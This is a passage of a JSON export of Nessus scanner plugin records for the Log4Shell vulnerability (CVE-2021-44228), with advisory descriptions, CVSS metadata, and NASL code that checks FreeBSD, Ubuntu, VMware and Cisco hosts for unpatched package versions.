severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:49:05", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:graylog", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "href": "https://www.tenable.com/plugins/nessus/156021", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156021);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"FreeBSD : graylog -- include log4j patches (3fadd7e4-f8fb-45a0-a218-8fd6423c338f)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 3fadd7e4-f8fb-45a0-a218-8fd6423c338f advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://github.com/Graylog2/graylog2-server/commit/d3e441f1126f0dc292e986879039a87c59375b2a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0936599f\");\n script_set_attribute(attribute:\"see_also\", value:\"https://logging.apache.org/log4j/2.x/security.html\");\n # https://vuxml.freebsd.org/freebsd/3fadd7e4-f8fb-45a0-a218-8fd6423c338f.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?90d622ae\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:graylog\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'graylog<4.2.3'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-07T16:50:06", "description": "The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a vulnerability as referenced in the 4b1ac5a3-5bd4-11ec-8602-589cfc007716 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "FreeBSD : OpenSearch -- Log4Shell (4b1ac5a3-5bd4-11ec-8602-589cfc007716)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-11-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:opensearch", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "href": "https://www.tenable.com/plugins/nessus/156026", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# @NOAGENT@\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156026);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/11/06\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"FreeBSD : OpenSearch -- Log4Shell (4b1ac5a3-5bd4-11ec-8602-589cfc007716)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of FreeBSD installed on the remote host is prior to tested version. It is, therefore, affected by a\nvulnerability as referenced in the 4b1ac5a3-5bd4-11ec-8602-589cfc007716 advisory.\n\n - Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect\n against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log\n messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup\n substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. In previous\n releases (>2.10) this behavior can be mitigated by setting system property log4j2.formatMsgNoLookups to\n true or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar\n org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see\n https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code\n execution by defaulting com.sun.jndi.rmi.object.trustURLCodebase and\n com.sun.jndi.cosnaming.object.trustURLCodebase to false. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://opensearch.org/blog/releases/2021/12/update-to-1-2-1/\");\n # https://vuxml.freebsd.org/freebsd/4b1ac5a3-5bd4-11ec-8602-589cfc007716.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?036fbe2f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:opensearch\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"freebsd_package.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nvar flag = 0;\n\nvar packages = [\n 'opensearch<1.2.1'\n];\n\nforeach var package( packages ) {\n if (pkg_test(save_report:TRUE, pkg: package)) flag++;\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : pkg_report_get()\n );\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T15:21:42", "description": "The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the USN-5192-2 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-12-17T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 ESM : Apache Log4j 2 vulnerability (USN-5192-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-23T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:16.04:-:esm", "p-cpe:/a:canonical:ubuntu_linux:liblog4j2-java"], "id": "UBUNTU_USN-5192-2.NASL", "href": "https://www.tenable.com/plugins/nessus/156161", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5192-2. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156161);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/23\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"USN\", value:\"5192-2\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"2021-A-0597\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Ubuntu 16.04 ESM : Apache Log4j 2 vulnerability (USN-5192-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 16.04 LTS host has a package installed that is affected by a vulnerability as referenced in the\nUSN-5192-2 advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5192-2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected liblog4j2-java package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04:-:esm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liblog4j2-java\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/Ubuntu/release');\nif ( isnull(os_release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nos_release = chomp(os_release);\nif (! ('16.04' >< os_release)) audit(AUDIT_OS_NOT, 'Ubuntu 16.04', 'Ubuntu ' + os_release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar pkgs = [\n {'osver': '16.04', 'pkgname': 'liblog4j2-java', 'pkgver': '2.4-2ubuntu0.1~esm1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var osver = NULL;\n var pkgname = NULL;\n var pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'liblog4j2-java');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T15:07:36", "description": "A remote code execution vulnerability exists in VMWare vCenter in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via a web request, to execute arbitrary code with the permission level of the running Java process.", "cvss3": {}, "published": "2021-12-13T00:00:00", "type": "nessus", "title": "VMware vCenter Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156035", "sourceData": "Binary data vmware_vcenter_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-18T14:40:40", "description": "A remote code execution vulnerability exists in VMware Horizon in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can explolit this, via a web request, to execute arbitrary code with the permission level of the running Java process.\n\nThis plugin requires that both the scanner and target machine have internet access.", "cvss3": {}, "published": "2022-01-07T00:00:00", "type": "nessus", "title": "VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-10-16T00:00:00", "cpe": ["cpe:/a:vmware:horizon"], "id": "VMWARE_HORIZON_LOG4SHELL.NBIN", "href": "https://www.tenable.com/plugins/nessus/156560", "sourceData": "Binary data vmware_horizon_log4shell.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:45:44", "description": "Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java logging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-05-16T00:00:00", "type": "nessus", "title": "Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-44228"], "modified": "2023-02-17T00:00:00", "cpe": ["cpe:/o:cisco:sd-wan_firmware", "cpe:/a:cisco:sd-wan_vmanage"], "id": "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "href": "https://www.tenable.com/plugins/nessus/161212", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161212);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/17\");\n\n script_cve_id(\"CVE-2021-44228\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCwa47745\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-apache-log4j-qRuKNEbd\");\n script_xref(name:\"IAVA\", value:\"2022-A-0138-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0004\");\n\n script_name(english:\"Cisco SD-WAN vManage Log4j Remote Code Execution (cisco-sa-apache-log4j-qRuKNEbd)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Cisco SD-WAN vManage is affected by the following critical vulnerability in the Apache Log4j Java \nlogging library as described in the cisco-sa-apache-log4j-qRuKNEbd advisory.\n\n - Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log\n messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints.\n An attacker who can control log messages or log message parameters can execute arbitrary code loaded from\n LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been\n disabled by default. From version 2.16.0, this functionality has been completely removed. Note that this\n vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging\n Services projects. (CVE-2021-44228)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?395cf983\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwa47745\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-44228\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 